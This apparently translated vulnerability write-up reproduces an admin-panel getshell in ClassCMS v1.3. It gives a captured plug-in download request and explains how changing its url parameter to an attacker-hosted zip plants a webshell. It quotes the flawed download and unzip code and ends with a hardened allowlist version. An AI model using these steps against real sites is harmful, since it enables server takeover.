2025-04-02 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article reproduces the ClassCMS background (admin panel) getshell issue. Many newcomers are not clear on how it works, so the steps are explained in detail below, first as a black-box test and then by reading the code.
About ClassCMS
Official website of ClassCMS: https://classcms.com/
ClassCMS is a simple and flexible open source content management system that can be used to quickly develop a variety of website applications.
It is compatible with PHP 5.2 through PHP 8.0 and runs on Apache, Nginx and IIS. MySQL and SQLite databases are supported by default, and data sets with millions of records are supported.
The system has no extra functions. The overall installation package is less than 1M (less than 300KB without the editor and Layui). It has a complete and flexible application plug-in mechanism, and common functions can be packaged as application plug-ins.
The template language is simple: knowing HTML and CSS is enough to make a simple website template.
The background pages are built on Layui and are responsive, so they also work well on mobile devices.
Through the background model you can quickly add columns. Unlimited column nesting is supported, and column URLs can contain Chinese characters.
It provides many input box types, so article fields, column variables and user attributes can be extended quickly, and application plug-ins can add further input box types.
The background has a complete permission system: the permissions of each role can be customized, including view and modify permissions on columns and input boxes.
Black box test reproduction of Getshell in ClassCMS background
Download the latest version of ClassCMS, v1.3.
After downloading and decompressing the program, it looks as shown in the following figure.
Set up the environment and start it.
Complete the configuration.
Open App Management > App Store.
Click on any app to download it.
Capture the request when you click download.
Look at the response.
At this point the response returns a plug-in download address.
Continue forwarding the request.
POST /admin/?do=shop:downloadClass&ajax=1 HTTP/1.1
Host: 192.168.253.1:8013
Content-Length: 142
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.253.1:8013
Referer: http://192.168.253.1:8013/admin/?do=shop:index&bread=304%E7%BC%93%E5%AD%98%E6%8F%92%E4%BB%B6&action=detail&classhash=cache304
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: token_43f1a9=53f68d86f94ad3c93551924e77d0e91a; csrf_43f1a9=5f5244ce
Connection: close

classhash=cache304&url=http%3A%2F%2Fclasscms.com%2Fshop%2F%3Faction%3Ddownload%26version%3D1.0%26classhash%3Dcache304%26token%3D&csrf=5f5244ce
The request POSTs a plug-in address (url) and a plug-in name (classhash) to /admin/?do=shop:downloadClass&ajax=1.
Create a new pony (a small webshell) and compress it.
Upload the archive to a server and have it downloaded from there, or find a place on the website where files can be uploaded.
Change the url parameter to the address of the compressed package.
Then visit
http://192.168.253.1:8013/class/cache304/index.php
The pony has been uploaded successfully.
White-box test reproduction of ClassCMS background Getshell
Look directly at line 82 of /class/shop/shop.php.
The this:download function is called directly:
function download($url, $filepath) {
    $curl = curl_init();
    // $url is used as supplied in the request; no host or scheme check is made
    curl_setopt($curl, CURLOPT_URL, $url);
    if (!$fp = @fopen($filepath, 'w+')) {
        return false;
    }
    curl_setopt($curl, CURLOPT_FILE, $fp);
    curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($curl, CURLOPT_TIMEOUT, 300);
    // TLS certificate and host verification are both switched off
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE);
    $info = curl_exec($curl);
    $httpinfo = curl_getinfo($curl);
    curl_close($curl);
    fclose($fp);
    if ($httpinfo['http_code'] >= 300) {
        @unlink($filepath);
        return false;
    }
    return $info;
}
Then go to line 92.
// The downloaded archive is unpacked into the plug-in directory
if (C('cms:class:unzip', $classfile, $classdir)) {
    @unlink($classfile);
    if (C('cms:class:refresh', $classhash)) {
        echo(array('msg' => "download completed, please install this application in the application management page"));
        return;
    } else {
        echo(array('msg' => "installation package format error, please try again", 'error' => 1));
        return;
    }
} else {
    @unlink($classfile);
    echo(array('msg' => "failed to extract the installation package, please try again", 'error' => 1));
    return;
}
This calls the unzip method in /cms/class.php:
function unzip($src_file, $dest_dir = false, $create_zip_name_dir = true, $overwrite = true) {
    if (class_exists('ZipArchive')) {
        $zip = new ZipArchive;
        if ($zip->open($src_file) === TRUE) {
            // Every entry is extracted; entry names and types are not inspected
            if (@$zip->extractTo($dest_dir)) {
                $zip->close();
                return true;
            }
            $zip->close();
        }
    } elseif (function_exists('zip_open')) {
        if (!cms_createdir($dest_dir)) {
            return false;
        }
        if ($zip = zip_open($src_file)) {
            if ($zip) {
                if ($create_zip_name_dir) {
                    $splitter = '.';
                } else {
                    $splitter = '/';
                }
                if ($dest_dir === false) {
                    $dest_dir = substr($src_file, 0, strrpos($src_file, $splitter)) . "/";
                }
                while ($zip_entry = @zip_read($zip)) {
                    $pos_last_slash = strrpos(zip_entry_name($zip_entry), "/");
                    if ($pos_last_slash !== false) {
                        cms_createdir($dest_dir . substr(zip_entry_name($zip_entry), 0, $pos_last_slash + 1));
                    }
                    if (zip_entry_open($zip, $zip_entry, "r")) {
                        $file_name = $dest_dir . zip_entry_name($zip_entry);
                        if ($overwrite === true || $overwrite === false && !is_file($file_name)) {
                            $fstream = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry));
                            @file_put_contents($file_name, $fstream);
                        }
                        zip_entry_close($zip_entry);
                    }
                }
                @zip_close($zip);
            }
            return true;
        }
    }
    return false;
}
The file downloaded from the supplied url is decompressed directly, with no check on where it came from or what it contains, and this is what produces the background getshell.
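A hardened counterpart to the download step above, added here as an example and not taken from ClassCMS: it fetches only from an allowlisted store host with TLS verification on and redirects off, and it constrains the plug-in name. The helper names, the allowlist containing classcms.com (the host in the captured request) and the HTTPS-only policy are assumptions.

```php
<?php
// Added example, not ClassCMS code; helper names are hypothetical. Needs PHP 5.6+.
// Assumption: plug-ins may only come from the store host seen in the captured
// request (classcms.com), and only over HTTPS.
const STORE_HOSTS = ['classcms.com'];

function is_trusted_store_url($url) {
    $p = parse_url($url);
    if (!is_array($p) || !isset($p['scheme'], $p['host'])) {
        return false;
    }
    // Reject userinfo (https://classcms.com@other.host/) and non-default ports.
    if (isset($p['user']) || isset($p['pass']) || isset($p['port'])) {
        return false;
    }
    return strtolower($p['scheme']) === 'https'
        && in_array(strtolower($p['host']), STORE_HOSTS, true);
}

function is_valid_classhash($classhash) {
    // classhash becomes a directory name under /class/, so restrict its alphabet.
    return is_string($classhash) && preg_match('/\A[a-z0-9_]{1,32}\z/i', $classhash) === 1;
}

function safe_download($url, $filepath) {
    if (!is_trusted_store_url($url) || !($fp = @fopen($filepath, 'w+'))) {
        return false;
    }
    $curl = curl_init($url);
    curl_setopt($curl, CURLOPT_FILE, $fp);
    curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($curl, CURLOPT_TIMEOUT, 300);
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, true);   // verify the certificate chain
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 2);      // and that it matches the host
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);  // a redirect could leave the allowlist
    $ok = curl_exec($curl);
    $code = curl_getinfo($curl, CURLINFO_HTTP_CODE);
    curl_close($curl);
    fclose($fp);
    if ($ok === false || $code !== 200) {
        @unlink($filepath);
        return false;
    }
    return true;
}

// Constructed inputs: a store URL, and a URL shaped like the changed url parameter.
var_dump(is_trusted_store_url('https://classcms.com/shop/?action=download&classhash=cache304'));
var_dump(is_trusted_store_url('http://192.168.253.1:8013/plugin.zip'));
var_dump(is_valid_classhash('cache304'), is_valid_classhash('../cache304'));
```

Because plug-ins are themselves PHP, filtering archive contents by extension is not a workable control here; restricting where the archive may come from is what closes the path shown above.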